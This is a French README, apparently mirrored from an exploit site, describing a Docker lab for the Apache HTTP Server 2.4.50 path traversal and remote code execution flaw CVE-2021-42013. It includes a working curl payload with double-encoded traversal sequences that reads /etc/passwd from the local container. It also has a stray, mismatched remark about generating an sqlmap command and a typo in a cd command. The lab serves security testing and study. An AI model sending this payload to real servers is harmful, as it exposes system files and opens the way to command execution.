Share
## https://sploitus.com/exploit?id=2108729F-1E99-54EF-9A4B-47299FD89FF2
# Dockerisation d'une Vulnérabilité : cve-2021-42013

Ce projet vise Ă  dockeriser une vulnĂ©rabilitĂ© spĂ©cifique en utilisant Docker. L'objectif est de crĂ©er un environnement isolĂ© dans lequel la vulnĂ©rabilitĂ© peut ĂȘtre exploitĂ©e et testĂ©e de maniĂšre sĂ©curisĂ©e.

## Application vulnérable

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

## Installation

Pour exécuter ce projet, vous devez avoir sur votre machine :

- [Docker](https://www.docker.com/)
- [Python](https://www.python.org/)
- [Curl](https://curl.se/)


Une fois les prérequis installé, vous pouvez cloner ce dépÎt Git sur votre machine :

```bash
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

```

Une fois dans le répertoire, exécuter la commande si dessous pour mettre en place l'environement vulnérable:

```bash
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

```

Accéder ensuite à l'application à l'adresse http://localhost:8000
Si tout va bien, vous devez voir s'afficher "It works"




## Exploitation de la vulnérabilité

L'exécution de ce payload avec `curl` ci dessous nous montre que la cible est vulnérable. Le script générera la commande sqlmap appropriée pour exploiter la vulnérabilité

```bash
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

```
Ce payload peut accéder directement aux informations relatives à l'utilisateur dans le systÚme sans le consentement de l'utilisateur.

Une fois que nous aurons activé les mods cgi ou cgid sur le serveur, cette vulnérabilité permettra à un attaquant d'exécuter des commandes arbitraires